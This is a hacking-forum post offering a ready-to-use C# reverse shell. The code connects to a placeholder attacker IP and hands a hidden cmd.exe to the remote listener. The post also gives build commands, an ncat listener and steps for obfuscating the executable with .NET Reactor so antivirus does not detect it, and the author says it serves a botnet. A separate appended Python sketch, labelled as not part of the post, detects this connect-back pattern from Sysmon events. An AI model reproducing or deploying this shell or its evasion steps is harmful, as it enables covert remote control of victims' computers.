05-27-2023, 05:50 PM (This post was last modified: 05-27-2023, 05:55 PM by Xprogrammer.)
Simple C# FUD reverse shell
Hi, I'm Xprogrammer from CBB!
I'm sharing a simple and lazy noob way to create a FUD reverse shell, no skills required, detection (1/69).
There are many ways and scripts to achieve this, but I'm sharing the simplest one.
Required software
Won't lie, I'm using Windows to create malware, so you will need:
- .NET SDK
- .NET Reactor
- C# compiler
- Basic IDE (e.g. VS Code)
- Netcat
Required skills
(None)
Let's begin
I found by googling that using cmd.exe to run the process will make the program almost FUD, instead of writing code that directly connects to the host. So here is the simple C# code:
Sorry for the indentation, but I had a hard time formatting this post ...
Code:
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
namespace ConnectBack
{
public class Program
{
static StreamWriter streamWriter;
public static void Main(string[] args)
{
using(TcpClient client = new TcpClient("<attacker_ip>", 1234))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true)
{
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
}
}
Since I want to keep this "tutorial" very friendly, I am just going to explain how to compile the code and make it even more FUD with .NET Reactor:
- Create a project folder, open it with dotnet and run
Code:
dotnet new console
- Create a Program.cs file with the code
- Run
Code:
dotnet build
- You can try running your code using
Code:
dotnet run
- If you open a terminal with you will get the connection
Code:
ncat -lvp 1234*
*nc is on Linux and ncat is on Windows
To compile, you can just use this command. Make sure you use PublishSingleFile so that you will be able to deploy your payload easily with a single exe:
Code:
dotnet publish --output <output_path> --configuration Release --self-contained true --runtime win-x64 -p:PublishSingleFile=true
Now that's sick: with the current exe you can bypass Defender runtime, but some AV like Avast will still detect it. Here is how to fix it.
Open .NET Reactor, it's a nice program with a lot of options to obfuscate your .NET malware and assembly editor.
Open your compiled exe on the "Main Assembly", check string encryption, obfuscation, anti ILDASM and finally "control flow obfuscation", and set a high number.
For smart curious people who want to know what they are doing, you can read these docs: https://www.eziriz.com/help/definitions/anti_debug/
I used this to bypass AV for the botnet I'm creating FUD runtime IDS/IPS....
And by a spiritual magic move you will click on protect and your FUD reverse shell will be generated.
Stealth - FUD - SIMPLE
Xprogrammer .
We are Light Hat Arsenal, we are hackers for the light !
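
A defender-side view of the behaviour in the code posted above, as an added example that is not part of the original post: whatever obfuscation is applied to the binary, the process still opens an outbound TCP connection and starts cmd.exe as a child, and both actions show up in endpoint telemetry. The sketch correlates Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) records by ProcessGuid; the sample events, file paths, the 30-second window and the function names are all constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed Sysmon-style records (Event ID 1 = process creation,
# Event ID 3 = network connection). Field names follow Sysmon; values are made up.
SAMPLE_EVENTS = [
    {"EventID": 3, "UtcTime": "2023-05-27 17:50:01.120", "ProcessGuid": "{A-1}",
     "Image": r"C:\Users\bob\Downloads\ConnectBack.exe", "Initiated": "true",
     "DestinationIp": "203.0.113.10", "DestinationPort": 1234},
    {"EventID": 1, "UtcTime": "2023-05-27 17:50:01.480", "ProcessGuid": "{A-2}",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentProcessGuid": "{A-1}",
     "ParentImage": r"C:\Users\bob\Downloads\ConnectBack.exe"},
    # Benign: a shell opened from Explorer, whose parent never dialed out.
    {"EventID": 1, "UtcTime": "2023-05-27 17:51:00.000", "ProcessGuid": "{B-2}",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentProcessGuid": "{B-1}",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # Benign: an editor that connected out, then opened a terminal 20 minutes later.
    {"EventID": 3, "UtcTime": "2023-05-27 18:00:00.000", "ProcessGuid": "{C-1}",
     "Image": r"C:\Tools\editor.exe", "Initiated": "true",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
    {"EventID": 1, "UtcTime": "2023-05-27 18:20:00.000", "ProcessGuid": "{C-2}",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentProcessGuid": "{C-1}",
     "ParentImage": r"C:\Tools\editor.exe"},
]

SHELL_IMAGES = {"cmd.exe"}        # the child process the posted code launches
WINDOW = timedelta(seconds=30)    # assumed correlation window, tune per environment

def _ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")

def find_connect_back(events, window=WINDOW):
    """Flag processes that dialed out and spawned a shell close together in time."""
    outbound = {}
    for ev in events:
        if ev["EventID"] == 3 and ev.get("Initiated") == "true":
            outbound.setdefault(ev["ProcessGuid"], []).append(ev)
    alerts = []
    for ev in events:
        if ev["EventID"] != 1 or ev["Image"].rsplit("\\", 1)[-1].lower() not in SHELL_IMAGES:
            continue
        for conn in outbound.get(ev["ParentProcessGuid"], []):
            if abs(_ts(ev) - _ts(conn)) <= window:
                alerts.append({"parent": ev["ParentImage"], "shell": ev["Image"],
                               "dest": f'{conn["DestinationIp"]}:{conn["DestinationPort"]}'})
                break
    return alerts

if __name__ == "__main__":
    for alert in find_connect_back(SAMPLE_EVENTS):
        print(alert)
```

Because the rule keys on parent/child and network behaviour rather than file contents, string encryption and control-flow obfuscation of the executable do not change what it matches.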